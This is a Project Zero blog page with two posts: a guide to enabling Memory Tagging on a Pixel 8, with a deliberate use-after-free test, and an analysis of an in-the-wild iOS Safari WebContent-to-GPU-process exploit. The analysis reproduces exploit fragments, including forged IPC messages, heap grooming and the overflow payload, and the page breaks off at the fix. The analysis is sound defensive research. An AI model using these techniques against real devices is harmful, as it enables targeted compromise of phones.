Normal view

There are new articles available, click to refresh the page.
Before yesterdayGoogle Project Zero

First handset with MTE on the market

3 November 2023 at 17:04

By Mark Brand, Google Project Zero

Introduction

It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE!

The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's real potential to use this technology to make 0-day harder.

I've been running my Pixel 8 with MTE enabled since release day, and so far I haven't found any issues with any of the applications I use on a daily basis1, or any noticeable performance issues.

Currently, MTE is only available on the Pixel as a developer option, intended for app developers to test their apps using MTE, but we can configure it to default to synchronous mode for all2 apps and native user mode binaries. This can be done on a stock image, without bootloader unlocking or rooting required - just a couple of debugger commands. We'll do that now, but first:

Disclaimer

This is absolutely not a supported device configuration; and it's highly likely that you'll encounter issues with at least some applications crashing or failing to run correctly with MTE if you set your device up in this way. 

This is how I've configured my personal Pixel 8, and so far I've not experienced any issues, but this was somewhat of a surprise to me, and I'm still waiting to see what the first app that simply won't work at all will be...

Enabling MTE on Pixel 8/Pixel 8 Pro

Enabling MTE on an Android device requires the bootloader to reserve a portion of the device memory for storing tags. This means that there are two separate places where MTE needs to be enabled - first we need to configure the bootloader to enable it, and then we need to configure the system to use it in applications.

First we need follow the Android instructions to enable developer mode and USB debugging on the device:

Now we need to connect our phone to a trusted computer that has the Android debugging tools installed on it - I'm using my linux workstation:

markbrand@markbrand$ adb devices -l

List of devices attached

XXXXXXXXXXXXXX         device usb:3-3 product:shiba model:Pixel_8 device:shiba transport_id:5

markbrand@markbrand$ adb shell

shiba:/ $ setprop arm64.memtag.bootctl memtag

shiba:/ $ setprop persist.arm64.memtag.default sync

shiba:/ $ setprop persist.arm64.memtag.app_default sync

shiba:/ $ reboot

These commands are doing a couple of things - first, we're configuring the bootloader to enable MTE at boot. The second command sets the default MTE mode for native executables running on the device, and the third command sets the default MTE mode for apps. An app developer can enable MTE by using the manifest, but this system property sets the default MTE mode for apps, effectively making it opt-out instead of opt-in.

While on the topic of apps opting-out, it's worth noting that Chrome doesn't use the system allocator for most allocations, and instead uses PartitionAlloc. There is experimental MTE support under development, which can be enabled with some additional steps3. Unfortunately this currently requires setting a command-line flag which involves some security tradeoffs. We expect that Chrome will add an easier way to enable MTE support without these problems in the near future.

If we look at all of the system properties, we can see that there are a few additional properties that are related to memory tagging:

shiba:/ $ getprop | grep memtag

[arm64.memtag.bootctl]: [memtag]

[persist.arm64.memtag.app.com.android.nfc]: [off]

[persist.arm64.memtag.app.com.android.se]: [off]

[persist.arm64.memtag.app.com.google.android.bluetooth]: [off]

[persist.arm64.memtag.app_default]: [sync]

[persist.arm64.memtag.default]: [sync]

[persist.arm64.memtag.system_server]: [off]

[ro.arm64.memtag.bootctl_supported]: [1]

There are unfortunately some default exclusions which we can't overwrite - the protections on system properties mean that we can't currently enable MTE for a few components in a normal production build - these exceptions are system_server and applications related to nfc, the secure element and bluetooth.

We wanted to make sure that these commands work, so we'll do that now. We'll first check whether it's working for native executables:

shiba:/ $ cat /proc/self/smaps | grep mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

VmFlags: rd wr mr mw me ac mt

765bff1000-765c011000 r--s 00000000 00:12 97                             /dev/__properties__/u:object_r:arm64_memtag_prop:s0

We can see that our cat process has mappings with the mt bit set, so MTE has been enabled for the process.

Now in order to check that an app without any manifest setting has picked up this, we added a little bit of code to an empty JNI project to trigger a use-after-free bug:

extern "C" JNIEXPORT jstring JNICALL

Java_com_example_mtetestapplication_MainActivity_stringFromJNI(

        JNIEnv* env,

        jobject /* this */) {

    char* ptr = strdup("test string");

  free(ptr);

  // Use-after-free when ptr is accessed below.

    return env->NewStringUTF(ptr);

}

Without MTE, it's unlikely that the application would crash running this code. I also made sure that the application manifest does not set MTE, so it will inherit the default. When we launch the application we will see whether it crashes, and whether the crash is caused by an MTE check failure!

Looking at the logcat output we can see that the cause of the crash was a synchronous MTE tag check failure (SEGV_MTESERR).

DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

DEBUG   : Build fingerprint: 'google/shiba/shiba:14/UD1A.230803.041/10808477:user/release-keys'

DEBUG   : Revision: 'MP1.0'

DEBUG   : ABI: 'arm64'

DEBUG   : Timestamp: 2023-10-24 16:56:32.092532886+0200

DEBUG   : Process uptime: 2s

DEBUG   : Cmdline: com.example.mtetestapplication

DEBUG   : pid: 24147, tid: 24147, name: testapplication  >>> com.example.mtetestapplication <<<

DEBUG   : uid: 10292

DEBUG   : tagged_addr_ctrl: 000000000007fff3 (PR_TAGGED_ADDR_ENABLE, PR_MTE_TCF_SYNC, mask 0xfffe)

DEBUG   : pac_enabled_keys: 000000000000000f (PR_PAC_APIAKEY, PR_PAC_APIBKEY, PR_PAC_APDAKEY, PR_PAC_APDBKEY)

DEBUG   : signal 11 (SIGSEGV), code 9 (SEGV_MTESERR), fault addr 0x0b000072afa9f790

DEBUG   :     x0  0000000000000001  x1  0000007fe384c2e0  x2  0000000000000075  x3  00000072aae969ac

DEBUG   :     x4  0000007fe384c308  x5  0000000000000004  x6  7274732074736574  x7  00676e6972747320

DEBUG   :     x8  0000000000000020  x9  00000072ab1867e0  x10 000000000000050c  x11 00000072aaed0af4

DEBUG   :     x12 00000072aaed0ca8  x13 31106e3dee7fb177  x14 ffffffffffffffff  x15 00000000ebad6a89

DEBUG   :     x16 0000000000000001  x17 000000722ff047b8  x18 00000075740fe000  x19 0000007fe384c2d0

DEBUG   :     x20 0000007fe384c308  x21 00000072aae969ac  x22 0000007fe384c2e0  x23 070000741fa897b0

DEBUG   :     x24 0b000072afa9f790  x25 00000072aaed0c18  x26 0000000000000001  x27 000000754a5fae40

DEBUG   :     x28 0000007573c00000  x29 0000007fe384c260

DEBUG   :     lr  00000072ab35e7ac  sp  0000007fe384be30  pc  00000072ab1867ec  pst 0000000080001000

DEBUG   : 98 total frames

DEBUG   : backtrace:

DEBUG   :       #00 pc 00000000003867ec  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::ScopedCheck::Check(art::ScopedObjectAccess&, bool, char const*, art::(anonymous namespace)::JniValueType*) (.__uniq.99033978352804627313491551960229047428)+1636) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #01 pc 000000000055e7a8  /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::CheckJNI::NewStringUTF(_JNIEnv*, char const*) (.__uniq.99033978352804627313491551960229047428.llvm.6178811259984417487)+160) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG   :       #02 pc 00000000000017dc  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (_JNIEnv::NewStringUTF(char const*)+36) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

...

DEBUG   : Note: multiple potential causes for this crash were detected, listing them in decreasing order of likelihood.

DEBUG   : Cause: [MTE]: Use After Free, 0 bytes into a 12-byte allocation at 0x72afa9f790

DEBUG   : deallocated by thread 24147:

DEBUG   :       #00 pc 000000000005e800  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::quarantineOrDeallocateChunk(scudo::Options, void*, scudo::Chunk::UnpackedHeader*, unsigned long)+496) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #01 pc 0000000000057ba4  /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long)+212) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG   :       #02 pc 000000000000179c  /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (Java_com_example_mtetestapplication_MainActivity_stringFromJNI+40) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

If you just want to check that MTE has been enabled in the bootloader, there's an application on the Play Store from Google's Dynamic Tools team, which you can also use (this app enables MTE in async mode in the manifest, which is why you see below that it's not running in sync mode on all cores):

At this point, we can go back into the developer settings and disable USB debugging, since we don't want that enabled for normal day-to-day usage. We do need to leave the developer mode toggle on, since disabling that will turn off MTE again entirely on the next reboot.


Conclusion

The Pixel 8 with synchronous-MTE enabled is at least subjectively a performance and battery-life upgrade over my previous phone.

I think this is a huge improvement for the general security of the device - many zero-click attack surfaces involve large amounts of unsafe C/C++ code, whether that's WebRTC for calling, or one of the many media or image file parsing libraries. MTE is not a silver bullet for memory safety - but the release of the first production device with the ability to run almost all user-mode applications with synchronous-MTE is a huge step forward, and something that's worth celebrating!

1 On a team member's device, a single MTE detection of a use-after-free bug happened last week. This resulted in a crash that wasn't noticed at the time, but which we later found when looking through the saved crash reports on their device. Because the alloc and free stacktraces of the allocation were recorded, we were able to quickly figure out the bug and report it to the application developers - the bug in this case was caused by user gesture input, and doesn't really have security impact, but it already illustrates some of the advantages of MTE.

2 Except for se (secure element), bluetooth, nfc, and the system server, due to these system apps explicitly setting their individual system properties to 'off' in the Pixel system image.

3 Enabling MTE in Chrome requires setting multiple command line flags, which on a non-rooted Android device requires configuring Chrome to load the command line flags from a file in /data/local/tmp. This is potentially unsafe, so we'd not suggest doing this, but if you'd like to experiment on a test device or for fuzzing, the following commands will allow you to run Chrome with MTE enabled:

markbrand@markbrand:~$ adb shell

shiba:/ $ umask 022
shiba:/
 $ echo "_ --enable-features=PartitionAllocMemoryTagging:enabled-processes/all-processes/memtag-mode/sync --disable-features=PartitionAllocPermissiveMte,KillPartitionAllocMemoryTagging" > /data/local/tmp/chrome-command-line
shiba:/
 $ ls -la /data/local/tmp/chrome-command-line                                          

-rw-r--r-- 1 shell shell 176 2023-10-25 19:14 /data/local/tmp/chrome-command-line


Having run these commands, we need to configure Chrome to read the command line file; this can be done by opening Chrome, browsing to chrome://flags#enable-command-line-on-non-rooted-devices, and setting the highlighted flag to "Enabled".

Note that unfortunately this only applies to webpages viewed using the Chrome app, and not to other Chromium-based browsers or non-browser apps that use the Chromium based Android WebView to implement their rendering.

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit

13 October 2023 at 10:47

By Ian Beer

A graph rendering of the sandbox escape NSExpression payload node graph, with an eerie similarity to a human eye

A graph representation of the sandbox escape NSExpression payload

In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205.

Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.

Analysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to "hop" from WebContent to the GPU process, adding an extra link to the exploit chain (CVE-2023-32409).

On the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.

On the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.

Nevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.

Setting the stage

After gaining native code execution exploiting a JavaScriptCore Garbage Collection vulnerability the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:

// find and rebase symbols for current target and ASLR slide:

    dt: {

        ce: false,

        ["16.3.0"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

...

        ["16.3.1"]: {

            _e: 0x1ddc50ed1,

            de: 0x1dd2d05b8,

            ue: 0x19afa9760,

            he: 1392,

            me: 48,

            fe: 136,

            pe: 0x1dd448e70,

            ge: 305,

            Ce: 0x1dd2da340,

            Pe: 0x1dd2da348,

            ye: 0x1dd2d45f0,

            be: 0x1da613438,

// mach-o Uint32Array:

xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,

// deobfuscate xxx

...

// find-and-replace symbols:

xxxx.on(new m("0x2222222222222222"), p.Le);

xxxx.on(new m("0x3333333333333333"), Gs);

xxxx.on(new m("0x9999999999999999"), Bs);

xxxx.on(new m("0x8888888888888888"), Rs);

xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);

xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);

xxxx.on(new m("0xdddddddddddddddd"), p.Xt);

xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);

xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);

The initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.

Part I - Mysterious Messages

Looking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:

"AppleM2ScalerCSCDriver",0

"IOSurfaceRoot",0

"AGXAccelerator",0

But following the cross references to "AGXAccelerator" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own):

kern_return_t

get_a_user_client(char *matching_string,

                  u32 type,

                  void* s_out) {

  kern_return_t ret;

  struct uc_reply_msg;

  mach_port_name_t reply_port;

  struct msg_1 msg;

  reply_port = 0;

  mach_port_allocate(mach_task_self_,

                     MACH_PORT_RIGHT_RECEIVE,

                     &reply_port);

  memset(&msg, 0, sizeof(msg));

  msg.hdr.msgh_bits = 0x1413;

  msg.hdr.msgh_remote_port = a_global_port;

  msg.hdr.msgh_local_port = reply_port;

  msg.hdr.msgh_id = 5;

  msg.hdr.msgh_size = 200;

  msg.field_a = 0;

  msg.type = type;

  __strcpy_chk(msg.matching_str, matching_string, 128LL);

  ret = mach_msg_send(&msg.hdr);

...

  // return a port read from the reply message via s_out

Whilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own MIG serialization code for interacting with IOKit) this isn't a MIG message.

Trying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?

Down the rabbit hole

At this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.

In particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.

There is exactly one hit on Google for that constant:

A screenshot of a Google search result page with one result

Ignoring Google's helpful advice that maybe I wanted to search for "cake recipes" instead of this hex constant and following the single result leads to this snippet on opensource.apple.com in ConnectionCocoa.mm:

namespace IPC {

static const size_t inlineMessageMaxSize = 4096;

// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).

constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;

constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;

This is a constant used in Safari IPC messages!

Whilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.

The path less trodden

Googling for info on Safari IPC doesn't yield many results (apart from some very early Project Zero vulnerability reports) and looking through the WebKit source reveals heavy use of generated code and C++ operator overloading, neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.

But the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:

void Encoder::encodeHeader()

{

  *this << defaultMessageFlags;

  *this << m_messageName;

  *this << m_destinationID;

}

The flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:

Diagram showing the in-memory layout of a Safari IPC mach message with message header then serialized payload pointed to by an out-of-line descriptor

It's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's uname string, product and OS version to choose the correct hardcoded table of messageName values.

The IPC::description function in the iOS shared cache maps messageName values to IPC names:

const char * IPC::description(unsigned int messageName)

{

  if ( messageName > 0xC78 )

    return "<invalid message name>";

  else

    return off_1D61ED988[messageName];

}

The size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.

Using the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:

0x39:  GPUConnectionToWebProcess_CreateRemoteGPU

0x3a:  GPUConnectionToWebProcess_CreateRenderingBackend

0x9B5: InitializeConnection

0x9B7: ProcessOutOfStreamMessage

0xBA2: RemoteAdapter_RequestDevice

0xBA5: RemoteBuffer_MapAsync

0x271: RemoteBuffer_Unmap

0xBA6: RemoteCDMFactoryProxy_CreateCDM

0x2A2: RemoteDevice_CreateBuffer

0x2C7: RemoteDisplayListRecorder_DrawNativeImage

0x2D4: RemoteDisplayListRecorder_FillRect

0x2DF: RemoteDisplayListRecorder_SetCTM

0x2F3: RemoteGPUProxy_WasCreated

0xBAD: RemoteGPU_RequestAdapter

0x402: RemoteMediaRecorderManager_CreateRecorder

0xA85: RemoteMediaRecorderManager_CreateRecorderReply

0x412: RemoteMediaResourceManager_RedirectReceived

0x469: RemoteRenderingBackendProxy_DidInitialize

0x46D: RemoteRenderingBackend_CacheNativeImage

0x46E: RemoteRenderingBackend_CreateImageBuffer

0x474: RemoteRenderingBackend_ReleaseResource

0x9B8: SetStreamDestinationID

0x9B9: SyncMessageReply

0x9BA: Terminate

This list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.

Finding a way

The destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:

__data:000000003E4841C0 dst_port DCQ 0x4444444444444444

I mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:

 let Ls = o(p.Ee);

 let Ds = o(Ls.add(p.qe));

 let Ws = o(Ds.add(p.$e));

 let vs = o(Ws.add(p.Ze));

 jBHk.on(new m("0x4444444444444444"), vs);

Replacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:

 let Ls = o(0x1dd453458);

 let Ds = o(Ls.add(256));

 let Ws = o(Ds.add(24);

 let vs = o(Ws.add(280));

At the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:

WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process

Following the offsets we can see they follow this pointer chain to be able to find the mach port right representing the WebProcess's connection to the GPU process:

process->m_gpuProcessConnection->m_connection->m_sendPort

The exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.

Defining features

Webkit defines its IPC messages using a simple custom DSL in files ending with the suffix .messages.in. These definitions look like this:

messages -> RemoteRenderPipeline NotRefCounted Stream {

  void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);

  void SetLabel(String label)

}

These are parsed by this python script to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

void encode(IPC::Encoder&) const;

static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);

There are a number of macros defining these coders for the built-in types.

A pattern appears

Renaming the methods in the exploit which send IPC messages and reversing some more of their arguments a clear pattern emerges:

image_buffer_base_id = rand();

for (i = 0; i < 34; i++) {

  IPC_RemoteRenderingBackend_CreateImageBuffer(

    image_buffer_base_id + i);

}

semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 2);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 4);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 6);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 8);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 10);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);

usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(

  image_buffer_base_id + 12);

usleep(4000u);

IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);

usleep(4000u);

semaphore_signal(semaphore_b);

This creates 34 RemoteRenderingBackend ImageBuffer objects then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k.)

Diagram showing a pattern of alternating allocations

This looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.

A strange argument

I started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:

RemoteBuffer::MapAsync

RemoteBuffer::Unmap

These are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the WebGPU implementation.

Whilst the IPC machinery implementing WebGPU exists in Safari, the user-facing javascript API isn't present. It used to be available in Safari Technology Preview builds available from Apple but it hasn't been enabled there for some time. The W3C WebGPU group's github wiki suggests that when enabling WebGPU support in Safari users should "avoid leaving it enabled when browsing the untrusted web."

The IPC definitions for the RemoteBuffer look like this:

messages -> RemoteBuffer NotRefCounted Stream

{

  void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,

                PAL::WebGPU::Size64 offset,

                std::optional<PAL::WebGPU::Size64> size)

        ->

        (std::optional<Vector<uint8_t>> data) Synchronous

    void Unmap(Vector<uint8_t> data)

}

These WebGPU resources explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:

MapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.

Unmap then signals that the CPU is done with the buffer and ownership can return to the GPU.

In practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector<uint8_t>. Unmap then passes the new contents back to the GPU, also as a Vector<uint8_t>.

You might be able to see where this is going...

Buffer lifecycles

RemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:

messages -> RemoteDevice NotRefCounted Stream {

  void Destroy()

  void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,

                    WebKit::WebGPUIdentifier identifier)

This takes a description of the buffer to create and an identifier to name it. All the calls to this IPC in the exploit used a fixed size of 0x4000 which is 16KB, the size of a single physical page on iOS.

The first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:

IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,

                          0x4000,

                          0);

As shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end) of size 0 (ie nothing.)

Directly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the "new content":

b[0] = 0x7F6F3229LL;

b[1] = 0LL;

b[2] = 0LL;

b[3] = 0xFFFFLL;

b[4] = arg_val;

return IPC_RemoteBuffer_Unmap(dst, b, 40LL);

Buffer origins

I spent a considerable time trying to figure out the origin of the underlying pages backing the RemoteBuffer buffer allocations. Statically following the code from Webkit you eventually end up in the userspace-side of the AGX GPU family drivers, which are written in Objective-C. There are plenty of methods with names like

id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]

implying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.

Using dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 macbook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:

IOMemoryDescriptor::createMappingInTask

IOBufferMemoryDescriptor::initWithPhysicalMask

com.apple.AGXG13X`AGXAccelerator::

                    createBufferMemoryDescriptorInTaskWithOptions

com.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions

com.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions

com.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource

com.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource

kernel.release.t6000`0xfffffe00263116cc+0x80

kernel.release.t6000`0xfffffe00263117bc+0x28c

kernel.release.t6000`0xfffffe0025d326d0+0x184

kernel.release.t6000`0xfffffe0025c3856c+0x384

kernel.release.t6000`0xfffffe0025c0e274+0x2c0

kernel.release.t6000`0xfffffe0025c25a64+0x1a4

kernel.release.t6000`0xfffffe0025c25e80+0x200

kernel.release.t6000`0xfffffe0025d584a0+0x184

kernel.release.t6000`0xfffffe0025d62e08+0x5b8

kernel.release.t6000`0xfffffe0025be37d0+0x28

                 ^

--- kernel stack |   | userspace stack ---

                     v

libsystem_kernel.dylib`mach_msg2_trap

IOKit`io_connect_method

IOKit`IOConnectCallMethod

IOGPU`IOGPUResourceCreate

IOGPU`-[IOGPUMetalResource initWithDevice:

          remoteStorageResource:

          options:

          args:

          argsSize:]

IOGPU`-[IOGPUMetalBuffer initWithDevice:

          pointer:

          length:

          alignment:

          options:

          sysMemSize:

          gpuAddress:

          args:

          argsSize:

          deallocator:]

AGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:

                 length:

                 alignment:

                 options:

                 isSuballocDisabled:

                 resourceInArgs:

                 pinnedGPULocation:]

AGXMetalG13X`-[AGXBuffer initWithDevice:

                           length:

                           alignment:

                           options:

                           isSuballocDisabled:

                           pinnedGPULocation:]

AGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]

IOGPU`IOGPUMetalSuballocatorAllocate

The algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the "heap groom" seen earlier is so simple, as vm_allocate uses a simple bottom-up first fit algorithm.

mapAsync

With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:

void* Buffer::getMappedRange(size_t offset, size_t size)

{

    // https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange

    auto rangeSize = size;

    if (size == WGPU_WHOLE_MAP_SIZE)

        rangeSize = computeRangeSize(m_size, offset);

    if (!validateGetMappedRange(offset, rangeSize)) {

        // FIXME: "throw an OperationError and stop."

        return nullptr;

    }

    m_mappedRanges.add({ offset, offset + rangeSize });

    m_mappedRanges.compact();

    return static_cast<char*>(m_buffer.contents) + offset;

}

m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length is stored into the m_mappedRange field. The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.

unmap

Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.

void RemoteBuffer::unmap(Vector<uint8_t>&& data)

{

    if (!m_mappedRange)

        return;

    ASSERT(m_isMapped);

    if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))

        memcpy(m_mappedRange->source, data.data(), data.size());

    m_isMapped = false;

    m_mappedRange = std::nullopt;

    m_mapModeFlags = { };

}

The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents"  actually matches the size of the previous mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.

This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.

Here's the fix:

  void RemoteBuffer::unmap(Vector<uint8_t>&& data)

  {

-   if (!m_mappedRange)

+   if (!m_mappedRange || m_mappedRange->byteLength < data.size())

      return;

    ASSERT(m_isMapped);

